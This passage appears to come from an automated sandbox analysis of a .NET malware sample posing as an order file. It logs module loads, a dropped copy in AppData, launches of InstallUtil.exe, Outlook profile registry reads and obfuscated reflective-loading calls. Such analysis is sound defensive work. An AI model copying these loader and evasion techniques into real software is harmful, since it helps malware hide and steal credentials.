                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Fqhnalw.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: GEFA-Order 232343-68983689.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: GEFA-Order 232343-68983689.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000043AA000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.0000000004201000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1410426662.0000000006F50000.00000004.08000000.00040000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1585499252.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.000000000306C000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1677808724.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.000000000313D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: GEFA-Order 232343-68983689.exe, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000043AA000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.0000000004201000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1389741733.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1410426662.0000000006F50000.00000004.08000000.00040000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1585499252.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000004.00000002.1566745789.000000000306C000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1677808724.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Fqhnalw.exe, 00000006.00000002.1653047795.000000000313D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1409541914.0000000006D80000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1399224699.00000000044CF000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4209970.3.raw.unpack, JxjTJsLcVMlWTHfxdv2.cs.Net Code: Type.GetTypeFromHandle(LRRHRdFacvx8pdkSBQ9.K9nM54wEA2(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(LRRHRdFacvx8pdkSBQ9.K9nM54wEA2(16777259)),Type.GetTypeFromHandle(LRRHRdFacvx8pdkSBQ9.K9nM54wEA2(16777263))})
                    Source: GEFA-Order 232343-68983689.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                    Source: GEFA-Order 232343-68983689.exe, Wgiucr.cs.Net Code: _E003 System.AppDomain.Load(byte[])
                    Source: Fqhnalw.exe.0.dr, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                    Source: Fqhnalw.exe.0.dr, Wgiucr.cs.Net Code: _E003 System.AppDomain.Load(byte[])
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6d80000.10.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6d80000.10.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6d80000.10.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6d80000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6d80000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.GEFA-Order 232343-68983689.exe.435a4d8.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
